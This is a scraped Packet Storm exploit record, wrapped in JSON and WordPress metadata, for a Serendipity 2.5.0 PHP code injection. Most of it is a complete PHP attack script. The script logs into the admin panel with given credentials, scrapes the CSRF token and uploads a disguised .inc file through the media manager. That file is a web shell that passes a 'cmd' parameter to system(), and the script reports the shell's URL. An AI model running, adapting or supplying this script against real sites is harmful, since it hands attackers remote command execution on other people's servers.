{“lastseen”:”2026-02-19T16:32:54″,”description”:”Serendipity version 2.5.0 proof of concept PHP code injection exploit…”,”published”:”2026-02-19T00:00:00″,”modified”:”2026-02-19T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Serendipity 2.5.0 PHP Code Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:215868″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : Serendipity 2.5.0 PHP COde Injection Vulnerability |\\n | # Author : indoushka |\\n | # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 136.0.0 (64 bits) |\\n | # Vendor : https:\/\/www.s9y.org\/latest |\\n =============================================================================================================================================\\n \\n POC :\\n \\n [+] Dorking \u0130n Google Or Other Search Enggine.\\n \\n [+] Code Description: Serendipity 2.5.0 – Remote Command Execution Exploit in PHP\\n \\n (Related : https:\/\/packetstorm.news\/files\/id\/178890\/ Related CVE numbers: ) .\\n \\t\\n [+] save code as poc.php.\\n \\n [+] Usage: php script.php \\u003csiteurl\\u003e \\u003cusername\\u003e \\u003cpassword\\u003e\\n \\n [+] PayLoad :\\n \\n \\u003c?php\\n function generate_filename($extension = \\”.inc\\”) {\\n $characters = ‘ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789’;\\n $filename = ”;\\n for ($i = 0; $i \\u003c 5; $i++) {\\n $filename .= $characters[rand(0, strlen($characters) – 1)];\\n }\\n return $filename . $extension;\\n }\\n \\n function get_csrf_token($response) {\\n preg_match(‘\/\\u003cinput.*name=\\”serendipity\\\\[token\\\\]\\”.*value=\\”(.*?)\\”\/’, $response, $matches);\\n return $matches[1] ?? null;\\n }\\n \\n function login($base_url, $username, $password) {\\n echo \\”Logging in…\\\\n\\”;\\n sleep(2);\\n \\n $session = curl_init();\\n curl_setopt($session, CURLOPT_URL, $base_url . \\”\/serendipity_admin.php\\”);\\n curl_setopt($session, CURLOPT_RETURNTRANSFER, true);\\n $login_page = curl_exec($session);\\n $token = get_csrf_token($login_page);\\n \\n $data = [\\n \\”serendipity[action]\\” =\\u003e \\”admin\\”,\\n \\”serendipity[user]\\” =\\u003e $username,\\n \\”serendipity[pass]\\” =\\u003e $password,\\n \\”submit\\” =\\u003e \\”Login\\”,\\n \\”serendipity[token]\\” =\\u003e $token\\n ];\\n \\n $headers = [\\n \\”Content-Type: application\/x-www-form-urlencoded\\”,\\n \\”Referer: \\” . $base_url . \\”\/serendipity_admin.php\\”\\n ];\\n \\n curl_setopt($session, CURLOPT_URL, $base_url . \\”\/serendipity_admin.php\\”);\\n curl_setopt($session, CURLOPT_POST, true);\\n curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($data));\\n curl_setopt($session, CURLOPT_HTTPHEADER, $headers);\\n $response = curl_exec($session);\\n \\n if (strpos($response, \\”Add media\\”) !== false) {\\n echo \\”Login Successful!\\\\n\\”;\\n sleep(2);\\n return $session;\\n } else {\\n echo \\”Login Failed!\\\\n\\”;\\n return null;\\n }\\n }\\n \\n function upload_file($session, $base_url, $filename, $token) {\\n echo \\”Shell Preparing…\\\\n\\”;\\n sleep(2);\\n \\n $boundary = \\”—————————395233558031804950903737832368\\”;\\n $headers = [\\n \\”Content-Type: multipart\/form-data; boundary=\\” . $boundary,\\n \\”Referer: \\” . $base_url . \\”\/serendipity_admin.php?serendipity[adminModule]=media\\”\\n ];\\n \\n $payload = \\”–$boundary\\\\r\\\\n\\”\\n . \\”Content-Disposition: form-data; name=\\\\\\”serendipity[token]\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”\\n . \\”$token\\\\r\\\\n\\”\\n . \\”–$boundary\\\\r\\\\n\\”\\n . \\”Content-Disposition: form-data; name=\\\\\\”serendipity[action]\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”\\n . \\”admin\\\\r\\\\n\\”\\n . \\”–$boundary\\\\r\\\\n\\”\\n . \\”Content-Disposition: form-data; name=\\\\\\”serendipity[adminModule]\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”\\n . \\”media\\\\r\\\\n\\”\\n . \\”–$boundary\\\\r\\\\n\\”\\n . \\”Content-Disposition: form-data; name=\\\\\\”serendipity[adminAction]\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”\\n . \\”add\\\\r\\\\n\\”\\n . \\”–$boundary\\\\r\\\\n\\”\\n . \\”Content-Disposition: form-data; name=\\\\\\”serendipity[userfile][1]\\\\\\”; filename=\\\\\\”$filename\\\\\\”\\\\r\\\\n\\”\\n . \\”Content-Type: text\/html\\\\r\\\\n\\\\r\\\\n\\”\\n . \\”\\u003chtml\\u003e\\\\n\\u003cbody\\u003e\\\\n\\u003cform method=\\\\\\”GET\\\\\\” name=\\\\\\”\\u003c?php echo basename(\\\\$_SERVER[‘PHP_SELF’]); ?\\u003e\\\\\\”\\u003e\\\\n\\”\\n . \\”\\u003cinput type=\\\\\\”TEXT\\\\\\” name=\\\\\\”cmd\\\\\\” autofocus id=\\\\\\”cmd\\\\\\” size=\\\\\\”80\\\\\\”\\u003e\\\\n\\u003cinput type=\\\\\\”SUBMIT\\\\\\” value=\\\\\\”Execute\\\\\\”\\u003e\\\\n\\”\\n . \\”\\u003c\/form\\u003e\\\\n\\u003cpre\\u003e\\\\n\\u003c?php\\\\nif(isset(\\\\$_GET[‘cmd’]))\\\\n{\\\\nsystem(\\\\$_GET[‘cmd’]);\\\\n}\\\\n?\\u003e\\\\n\\u003c\/pre\\u003e\\\\n\\u003c\/body\\u003e\\\\n\\u003c\/html\\u003e\\\\r\\\\n\\”\\n . \\”–$boundary–\\\\r\\\\n\\”;\\n \\n curl_setopt($session, CURLOPT_URL, $base_url . \\”\/serendipity_admin.php?serendipity[adminModule]=media\\”);\\n curl_setopt($session, CURLOPT_POST, true);\\n curl_setopt($session, CURLOPT_HTTPHEADER, $headers);\\n curl_setopt($session, CURLOPT_POSTFIELDS, $payload);\\n $response = curl_exec($session);\\n \\n if (strpos($response, \\”File $filename successfully uploaded as\\”) !== false) {\\n echo \\”Your shell is ready: \\” . $base_url . \\”\/uploads\/$filename\\\\n\\”;\\n } else {\\n echo \\”Exploit Failed!\\\\n\\”;\\n }\\n }\\n \\n function main($base_url, $username, $password) {\\n $filename = generate_filename();\\n $session = login($base_url, $username, $password);\\n if ($session) {\\n $token = get_csrf_token(curl_exec($session));\\n upload_file($session, $base_url, $filename, $token);\\n }\\n }\\n \\n if ($argc != 4) {\\n echo \\”Usage: php script.php \\u003csiteurl\\u003e \\u003cusername\\u003e \\u003cpassword\\u003e\\\\n\\”;\\n } else {\\n main($argv[1], $argv[2], $argv[3]);\\n }\\n ?\\u003e\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215868″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215868\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-19T16:32:54″,”description”:”Serendipity version 2.5.0 proof of concept PHP code injection exploit…”,”published”:”2026-02-19T00:00:00″,”modified”:”2026-02-19T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Serendipity 2.5.0 PHP Code Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:215868″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : Serendipity 2.5.0 PHP COde Injection Vulnerability…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-41672","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n